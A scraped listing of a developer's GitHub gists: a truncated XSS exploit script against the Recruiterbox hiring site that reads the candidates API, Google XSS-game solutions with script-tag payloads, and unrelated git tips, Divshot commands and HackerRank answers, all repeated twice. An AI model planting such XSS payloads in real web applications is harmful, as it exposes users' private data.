Dheeraj Joshi djadmin

## recruiterbox_exploit.js
// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
var candidates = [];
var request = new XMLHttpRequest();
request.open('GET', '/api/v1/candidates/', true);
request.onload = function() {
  var data = JSON.parse(request.responseText);
  console.log(data);
  candidates = data && data.objects;
  var profile = candidates.find(function (cand) {
  	return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';

## keybase.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                djadmin
                / keybase.md
            
            
              Created
              July 29, 2016 20:20
            
          
    Keybase proof

I hereby claim:

I am djadmin on github.
I am djadmin (https://keybase.io/djadmin) on keybase.
I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo

To claim this, I am signing this object:

  
## config
$ vim .git/config

push = +refs/heads/master:refs/heads/gh-pages
push = +refs/heads/master:refs/heads/master

## gist:ac89d4b2451f317259e4

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                djadmin
                / gist:ac89d4b2451f317259e4
            
            
              Last active
              December 11, 2015 20:59
            
              
                What is my Referer ?
              
          
    HTTPS
https://djadmin.github.io/pwn/referer.html
HTTP
http://djadmin.github.io/pwn/referer.html

  
## git-status-watch.sh
#Tired to doing git status? Watch git changes using the below script

#install watch using homebrew
$ brew install watch

#watch git status
$ watch --color git status


## divshot.sh
# Please follow these steps if you need to download your divshot project.
# Let's say you need to download 'my-project' from production and you have Divshot CLI installed.

divshot login
mkdir my-project
divshot init
divshot download production

# Done

## XSS-Game Solutions
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/

########################## Level 1: Hello, world of XSS ##########################

*** Query ***
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
*** Vector ***
<script>alert(1)</script>

########################## Level 2: Persistence is key ##########################

## hackerrank-language
languages=['C','CPP','JAVA','PYTHON','PERL','PHP','RUBY','CSHARP','HASKELL','CLOJURE','BASH','SCALA','ERLANG','CLISP','LUA','BRAINFUCK','JAVASCRIPT','GO','D','OCAML','R','PASCAL','SBCL','DART','GROOVY','OBJECTIVEC']

for i in xrange(input()):
    input=str(raw_input()).split()
    language=input[1]
    if language in languages:
        print 'VALID'
    else:
        print 'INVALID'

## hackerrank-tweets
count=0
for i in xrange(input()):
    text=str(raw_input())
    if 'hackerrank' in text.lower():
        count+=1
print count


## saying-hi
import re
for i in range(input()):
    text=str(raw_input())
    if re.search(r'^(hi [^d])',text,re.IGNORECASE):
        print text
	// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
	var candidates = [];
	var request = new XMLHttpRequest();
	request.open('GET', '/api/v1/candidates/', true);
	request.onload = function() {
	var data = JSON.parse(request.responseText);
	console.log(data);
	candidates = data && data.objects;
	var profile = candidates.find(function (cand) {
	return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';
	$ vim .git/config

	push = +refs/heads/master:refs/heads/gh-pages
	push = +refs/heads/master:refs/heads/master
	#Tired to doing git status? Watch git changes using the below script

	#install watch using homebrew
	$ brew install watch

	#watch git status
	$ watch --color git status
	# Please follow these steps if you need to download your divshot project.
	# Let's say you need to download 'my-project' from production and you have Divshot CLI installed.

	divshot login
	mkdir my-project
	divshot init
	divshot download production

	# Done
	Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/

	########################## Level 1: Hello, world of XSS ##########################

	* Query *
	https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
	* Vector *
	<script>alert(1)</script>

	########################## Level 2: Persistence is key ##########################
	languages=['C','CPP','JAVA','PYTHON','PERL','PHP','RUBY','CSHARP','HASKELL','CLOJURE','BASH','SCALA','ERLANG','CLISP','LUA','BRAINFUCK','JAVASCRIPT','GO','D','OCAML','R','PASCAL','SBCL','DART','GROOVY','OBJECTIVEC']

	for i in xrange(input()):
	input=str(raw_input()).split()
	language=input[1]
	if language in languages:
	print 'VALID'
	else:
	print 'INVALID'
	count=0
	for i in xrange(input()):
	text=str(raw_input())
	if 'hackerrank' in text.lower():
	count+=1
	print count
	import re
	for i in range(input()):
	text=str(raw_input())
	if re.search(r'^(hi [^d])',text,re.IGNORECASE):
	print text